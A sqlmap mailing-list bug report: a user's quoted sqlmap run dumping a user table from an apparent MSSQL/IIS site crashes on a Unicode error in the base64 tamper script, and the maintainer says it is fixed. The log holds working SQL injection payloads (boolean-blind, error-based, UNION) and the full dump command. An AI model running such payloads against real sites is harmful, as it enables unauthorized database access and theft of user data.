Hi.

This should be fixed now.

Bye


On Sat, Sep 21, 2013 at 4:55 AM, 沸水浮冰 <sfq...@gmail.com> wrote:

> root@anonymous:~/sqlmap-0905# ./sqlmap.py -r file2 -p 'major'
> --dbms=mssql --level=5 --risk=3 --tamper=base64encode -D vls3db4 -T
> dbo.dd_users -C '最后登录时间' --dump --hex -v 3
>
>     sqlmap/1.0-dev-4cf49bc - automatic SQL injection and database takeover
> tool
>     http://sqlmap.org
>
> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior
> mutual consent is illegal. It is the end user's responsibility to obey all
> applicable local, state and federal laws. Developers assume no liability
> and are not responsible for any misuse or damage caused by this program
>
> [*] starting at 00:51:25
>
> [00:51:25] [INFO] parsing HTTP request from 'file2'
> [00:51:25] [DEBUG] not a valid WebScarab log data
> [00:51:25] [DEBUG] cleaning up configuration parameters
> [00:51:25] [INFO] loading tamper script 'base64encode'
> [00:51:25] [DEBUG] setting the HTTP timeout
> [00:51:25] [DEBUG] setting the HTTP method to GET
> [00:51:25] [DEBUG] creating HTTP requests opener object
> [00:51:25] [DEBUG] forcing back-end DBMS to user defined value
> [00:51:25] [WARNING] it appears that you have provided tainted parameter
> values ('major=')waitfor delay'0:0:20'--') with most probably leftover
> chars/statements from manual SQL injection test(s). Please, always use only
> valid parameter values so sqlmap could be able to run properly
> Are you sure you want to continue? [y/N] y
> [00:51:26] [INFO] testing connection to the target URL
> [00:51:49] [DEBUG] declared web page charset 'gb2312'
> sqlmap identified the following injection points with a total of 0 HTTP(s)
> requests:
> ---
> Place: GET
> Parameter: major
>     Type: boolean-based blind
>     Title: OR boolean-based blind - WHERE or HAVING clause
>     Payload: classid=&specialid=2&qstr=&major=-1315') OR (1954=1954) AND
> ('IRZo'='IRZo&station=&idxpage=2&ptopid=
>     Vector: OR ([INFERENCE])
>
>     Type: error-based
>     Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING
> clause
>     Payload: classid=&specialid=2&qstr=&major=-3052') OR
> 5359=CONVERT(INT,(SELECT
> CHAR(113)+CHAR(122)+CHAR(118)+CHAR(121)+CHAR(113)+(SELECT (CASE WHEN
> (5359=5359) THEN CHAR(49) ELSE CHAR(48)
> END))+CHAR(113)+CHAR(101)+CHAR(99)+CHAR(99)+CHAR(113))) AND
> ('PLJO'='PLJO&station=&idxpage=2&ptopid=
>     Vector: OR [RANDNUM]=CONVERT(INT,(SELECT
> '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))
>
>     Type: UNION query
>     Title: Generic UNION query (random number) - 16 columns
>     Payload: classid=&specialid=2&qstr=&major=-7814') UNION ALL SELECT
> CHAR(113)+CHAR(122)+CHAR(118)+CHAR(121)+CHAR(113)+CHAR(106)+CHAR(86)+CHAR(99)+CHAR(114)+CHAR(70)+CHAR(111)+CHAR(78)+CHAR(116)+CHAR(69)+CHAR(87)+CHAR(113)+CHAR(101)+CHAR(99)+CHAR(99)+CHAR(113),1654,1654,1654,1654,1654,1654,1654,1654,1654,1654,1654,1654,1654,1654,1654--
> &station=&idxpage=2&ptopid=
>     Vector:  UNION ALL SELECT
> [QUERY],9026,9026,9026,9026,9026,9026,9026,9026,9026,9026,9026,9026,9026,9026,9026--
>
> ---
> [00:51:49] [WARNING] changes made by tampering scripts are not included in
> shown payload content(s)
> [00:51:49] [INFO] testing Microsoft SQL Server
> [00:51:49] [DEBUG] performed 0 queries in 0.00 seconds
> [00:51:49] [INFO] confirming Microsoft SQL Server
> [00:51:49] [DEBUG] performed 0 queries in 0.00 seconds
> [00:51:49] [DEBUG] performed 0 queries in 0.00 seconds
> [00:51:49] [DEBUG] performed 0 queries in 0.00 seconds
> [00:51:49] [PAYLOAD]
> LTQ3MjInKSBVTklPTiBBTEwgU0VMRUNUIENIQVIoMTEzKStDSEFSKDEyMikrQ0hBUigxMTgpK0NIQVIoMTIxKStDSEFSKDExMykrKENBU0UgV0hFTiAoQ09OQ0FUKE5VTEwsTlVMTCk9Q09OQ0FUKE5VTEwsTlVMTCkpIFRIRU4gQ0hBUig0OSkgRUxTRSBDSEFSKDQ4KSBFTkQpK0NIQVIoMTEzKStDSEFSKDEwMSkrQ0hBUig5OSkrQ0hBUig5OSkrQ0hBUigxMTMpLDYyNjYsNjI2Niw2MjY2LDYyNjYsNjI2Niw2MjY2LDYyNjYsNjI2Niw2MjY2LDYyNjYsNjI2Niw2MjY2LDYyNjYsNjI2Niw2MjY2LS0g
> [00:51:50] [DEBUG] performed 1 queries in 0.57 seconds
> [00:51:50] [INFO] the back-end DBMS is Microsoft SQL Server
> web server operating system: Windows 2003
> web application technology: ASP.NET, Microsoft IIS 6.0
> back-end DBMS: Microsoft SQL Server 2008
> [00:51:50] [INFO] fetching columns '最后登录时间' for table 'dd_users' in
> database 'vls3db4'
> [00:51:50] [INFO] the SQL query used returns 1 entries
> [00:51:50] [DEBUG] performed 0 queries in 0.02 seconds
> [00:51:50] [INFO] fetching entries of column(s) '[最后登录时间]' for table
> 'dd_users' in database 'vls3db4'
> [00:51:50] [DEBUG] performed 0 queries in 0.00 seconds
> [00:51:50] [INFO] fetching number of distinct values for column '[最后登录时间]'
>
> Traceback (most recent call last):
>   File "/root/sqlmap-0905/thirdparty/ansistrm/ansistrm.py", line 51, in
> emit
>     message = stdoutencode(self.format(record))
>   File "/root/sqlmap-0905/lib/core/convert.py", line 160, in stdoutencode
>     retVal = data.encode(UNICODE_ENCODING)
> UnicodeDecodeError: 'ascii' codec can't decode byte 0xe6 in position 688:
> ordinal not in range(128)
> Logged from file sqlmap.py, line 125
> Traceback (most recent call last):
>   File "./sqlmap.py", line 95, in main
>     start()
>   File "/root/sqlmap-0905/lib/controller/controller.py", line 582, in start
>     action()
>   File "/root/sqlmap-0905/lib/controller/action.py", line 127, in action
>     conf.dbmsHandler.dumpTable()
>   File "/root/sqlmap-0905/plugins/generic/entries.py", line 155, in
> dumpTable
>     retVal = pivotDumpTable(table, colList, blind=False)
>   File "/root/sqlmap-0905/lib/utils/pivotdumptable.py", line 86, in
> pivotDumpTable
>     value = inject.getValue(query, blind=blind, union=not blind, error=not
> blind, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
>   File "/root/sqlmap-0905/lib/request/inject.py", line 360, in getValue
>     value = _goUnion(forgeCaseExpression if expected == EXPECTED.BOOL else
> query, unpack, dump)
>   File "/root/sqlmap-0905/lib/request/inject.py", line 312, in _goUnion
>     output = unionUse(expression, unpack=unpack, dump=dump)
>   File "/root/sqlmap-0905/lib/techniques/union/use.py", line 334, in
> unionUse
>     output = _oneShotUnionUse(expression, unpack)
>   File "/root/sqlmap-0905/lib/techniques/union/use.py", line 73, in
> _oneShotUnionUse
>     page, headers = Request.queryPage(payload, content=True,
> raise404=False)
>   File "/root/sqlmap-0905/lib/request/connect.py", line 641, in queryPage
>     payload = function(payload=payload, headers=auxHeaders)
>   File "/root/sqlmap-0905/tamper/base64encode.py", line 25, in tamper
>     return base64.b64encode(payload) if payload else payload
>   File "/usr/lib/python2.7/base64.py", line 53, in b64encode
>     encoded = binascii.b2a_base64(s)[:-1]
> UnicodeEncodeError: 'ascii' codec can't encode characters in position
> 147-152: ordinal not in range(128)
>
> [*] shutting down at 00:51:50
>
>
>
> ------------------------------------------------------------------------------
> LIMITED TIME SALE - Full Year of Microsoft Training For Just $49.99!
> 1,500+ hours of tutorials including VisualStudio 2012, Windows 8,
> SharePoint
> 2013, SQL 2012, MVC 4, more. BEST VALUE: New Multi-Library Power Pack
> includes
> Mobile, Cloud, Java, and UX Design. Lowest price ever! Ends 9/22/13.
> http://pubads.g.doubleclick.net/gampad/clk?id=64545871&iu=/4140/ostg.clktrk
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>


-- 
Miroslav Stampar
http://about.me/stamparm